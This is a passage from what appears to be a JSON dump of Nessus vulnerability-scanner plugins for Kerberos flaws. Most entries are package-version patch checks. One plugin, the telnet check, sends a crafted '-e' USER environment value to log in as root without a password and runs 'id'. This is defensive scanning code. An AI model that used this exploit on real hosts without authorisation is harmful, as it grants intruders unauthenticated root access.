Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29497);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0956\");\n\n script_name(english:\"SuSE 10 Security Update : krb5-apps-servers (ZYPP Patch Number 3022)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When using the krb5 telnet daemon it was possible for remote attackers\nto override authentication mechanisms and gain root access to the\nmachine by supplying a special username. \n\nThis is tracked by the Mitre CVE ID CVE-2007-0956.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-0956.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 3022.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"krb5-apps-servers-1.4.3-19.10.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:17", "description": "SEAM 1.0.2: patch for Solaris 9.\nDate this patch was last updated by Sun : Apr/03/07", "cvss3": {}, "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 116462-06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_116462.NASL", "href": "https://www.tenable.com/plugins/nessus/23517", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23517);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0956\");\n\n script_name(english:\"Solaris 9 (sparc) : 116462-06\");\n script_summary(english:\"Check for patch 116462-06\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 116462-06\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SEAM 1.0.2: patch for Solaris 9.\nDate this patch was last updated by Sun : Apr/03/07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/116462-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"116462-06\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.9.0,REV=2002.06.03.20.48\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:57", "description": "An authentication bypass vulnerability exists in the MIT krb5 telnet daemon due to a failure to sanitize malformed usernames. This allows usernames beginning with '-e' to be interpreted as a command-line flag by the login.krb5 program. A remote attacker can exploit this, via a crafted username, to cause login.krb5 to execute part of the BSD rlogin protocol, which in turn allows the attacker to login with an arbitrary username without a password or any further authentication.", "cvss3": {}, "published": "2007-04-05T00:00:00", "type": "nessus", "title": "Kerberos telnet Crafted Username Remote Authentication Bypass", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:mit:kerberos"], "id": "KRB_TELNET_ENV.NASL", "href": "https://www.tenable.com/plugins/nessus/24998", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n# Need Nessus 2.2.9 or newer\nif (NASL_LEVEL < 2204 ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24998);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2007-0956\");\n script_bugtraq_id(23281);\n script_xref(name:\"CERT\", value:\"220816\");\n\n script_name(english:\"Kerberos telnet Crafted Username Remote Authentication Bypass\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to log into the remote host using telnet without\nsupplying any credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"An authentication bypass vulnerability exists in the MIT krb5 telnet\ndaemon due to a failure to sanitize malformed usernames. This allows\nusernames beginning with '-e' to be interpreted as a command-line flag\nby the login.krb5 program. A remote attacker can exploit this, via a\ncrafted username, to cause login.krb5 to execute part of the BSD\nrlogin protocol, which in turn allows the attacker to login with an\narbitrary username without a password or any further authentication.\");\n # http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-001-telnetd.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ed21002\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the fixes described in MIT krb5 Security Advisory 2007-001, or\ncontact your vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"D2ExploitPack\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mit:kerberos\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude (\"global_settings.inc\");\ninclude (\"audit.inc\");\ninclude (\"byte_func.inc\");\ninclude (\"telnet2_func.inc\");\ninclude(\"data_protection.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nport = get_kb_item(\"Services/telnet\");\nif (!port) port = 23;\n\nglobal_var rcvdata, idsent, idstate;\n\nfunction local_telnet_callback ()\n{\n local_var data;\n data = _FCT_ANON_ARGS[0];\n\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d)\n rcvdata += data[0];\n\n\n if ( (idstate == 0 && (egrep(pattern:\"login:\", string:rcvdata, icase:TRUE))) || \n egrep(pattern:\"(password|usage):\", string:rcvdata, icase:TRUE) )\n {\n exit(0);\n }\n\n if (idstate == 0)\n {\n telnet_write('plop\\r\\0');\n telnet_write('\\0\\r\\0');\n rcvdata = NULL;\n idstate = 1;\n } \n\n if (idstate == 1 && \"login: login:\" >< rcvdata)\n {\n rcvdata = NULL;\n telnet_write('root\\r\\0');\n telnet_write('id\\r\\0');\n idstate = 2;\n }\n\n if (idstate == 2 && \"uid=\" >< rcvdata)\n {\n security_hole(port:port, extra:'It was possible to log in and execute \"id\" : \\n\\n' + data_protection::sanitize_uid(output:egrep(pattern:\"uid=\", string:rcvdata)));\n telnet_write('exit\\r\\0');\n exit(0);\n }\n}\n\n\nrcvdata = NULL;\nidstate = 0;\n\nenv_data = \n\tmkbyte(0) +\n\tmkbyte(0) + \"USER\" +\n\tmkbyte(1) + \"-e\";\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\nif (!telnet2_init(options:options, timeout:10))\n exit(0);\n\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:19:25", "description": "SEAM 1.0.2_x86: patch for Solaris 9_x86.\nDate this patch was last updated by Sun : Apr/03/07", "cvss3": {}, "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 5.9 (x86) : 119796-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2013-03-30T00:00:00", "cpe": [], "id": "SOLARIS9_X86_119796.NASL", "href": "https://www.tenable.com/plugins/nessus/23614", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(23614);\n script_version(\"1.17\");\n\n script_name(english: \"Solaris 5.9 (x86) : 119796-04\");\n script_cve_id(\"CVE-2007-0956\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 119796-04\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.2_x86: patch for Solaris 9_x86.\nDate this patch was last updated by Sun : Apr/03/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/119796-04\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/06\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 119796-04\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"119796-04\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.9.0,REV=2003.09.30.23.07\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:41", "description": "When using the krb5 telnet daemon it was possible for remote attackers to override authentication mechanisms and gain root access to the machine by supplying a special username. \n\nThis is tracked by the Mitre CVE ID CVE-2007-0956.", "cvss3": {}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : krb5-apps-servers (krb5-apps-servers-3021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:krb5-apps-servers", "cpe:/o:novell:opensuse:10.1", "cpe:/o:novell:opensuse:10.2"], "id": "SUSE_KRB5-APPS-SERVERS-3021.NASL", "href": "https://www.tenable.com/plugins/nessus/27313", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update krb5-apps-servers-3021.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27313);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0956\");\n\n script_name(english:\"openSUSE 10 Security Update : krb5-apps-servers (krb5-apps-servers-3021)\");\n script_summary(english:\"Check for the krb5-apps-servers-3021 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When using the krb5 telnet daemon it was possible for remote attackers\nto override authentication mechanisms and gain root access to the\nmachine by supplying a special username. \n\nThis is tracked by the Mitre CVE ID CVE-2007-0956.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-apps-servers package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-apps-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"krb5-apps-servers-1.4.3-19.10.3\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"krb5-apps-servers-1.5.1-23.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:57", "description": "SEAM 1.0.2_x86: patch for Solaris 9_x86.\nDate this patch was last updated by Sun : Apr/03/07", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Solaris 5.9 (sparc) : 119796-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0956"], "modified": "2013-03-30T00:00:00", "cpe": [], "id": "SOLARIS9_119796.NASL", "href": "https://www.tenable.com/plugins/nessus/36967", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(36967);\n script_version(\"1.9\");\n\n script_name(english: \"Solaris 5.9 (sparc) : 119796-04\");\n script_cve_id(\"CVE-2007-0956\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 119796-04\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.2_x86: patch for Solaris 9_x86.\nDate this patch was last updated by Sun : Apr/03/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/119796-04\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/04/23\");\n script_cvs_date(\"Date: 2018/07/20 0:18:54\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 119796-04\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"119796-04\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.9.0,REV=2003.09.30.23.07\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:02", "description": "Updated krb5 packages are now available for Red Hat Enterprise Linux 4 to correct a privilege escalation security flaw.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and servers to authenticate to each other through use of symmetric encryption and a trusted third party, the KDC.\n\nA flaw was found where some bundled Kerberos-aware applications would fail to check the result of the setuid() call. On Linux 2.6 kernels, the setuid() call can fail if certain user limits are hit. A local attacker could manipulate their environment in such a way to get the applications to continue to run as root, potentially leading to an escalation of privileges. (CVE-2006-3083).\n\nUsers are advised to update to these erratum packages which contain a backported fix to correct this issue.", "cvss3": {}, "published": "2006-08-10T00:00:00", "type": "nessus", "title": "RHEL 4 : krb5 (RHSA-2006:0612)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3083"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:krb5-devel", "p-cpe:/a:redhat:enterprise_linux:krb5-libs", "p-cpe:/a:redhat:enterprise_linux:krb5-server", "p-cpe:/a:redhat:enterprise_linux:krb5-workstation", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2006-0612.NASL", "href": "https://www.tenable.com/plugins/nessus/22201", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0612. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22201);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3083\");\n script_bugtraq_id(19427);\n script_xref(name:\"RHSA\", value:\"2006:0612\");\n\n script_name(english:\"RHEL 4 : krb5 (RHSA-2006:0612)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated krb5 packages are now available for Red Hat Enterprise Linux 4\nto correct a privilege escalation security flaw.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and\nservers to authenticate to each other through use of symmetric\nencryption and a trusted third party, the KDC.\n\nA flaw was found where some bundled Kerberos-aware applications would\nfail to check the result of the setuid() call. On Linux 2.6 kernels,\nthe setuid() call can fail if certain user limits are hit. A local\nattacker could manipulate their environment in such a way to get the\napplications to continue to run as root, potentially leading to an\nescalation of privileges. (CVE-2006-3083).\n\nUsers are advised to update to these erratum packages which contain a\nbackported fix to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0612\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0612\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-devel-1.3.4-33\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-libs-1.3.4-33\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-server-1.3.4-33\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"krb5-workstation-1.3.4-33\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-devel / krb5-libs / krb5-server / krb5-workstation\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:00", "description": "Updated krb5 packages are now available for Red Hat Enterprise Linux 4 to correct a privilege escalation security flaw.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nKerberos is a network authentication system which allows clients and 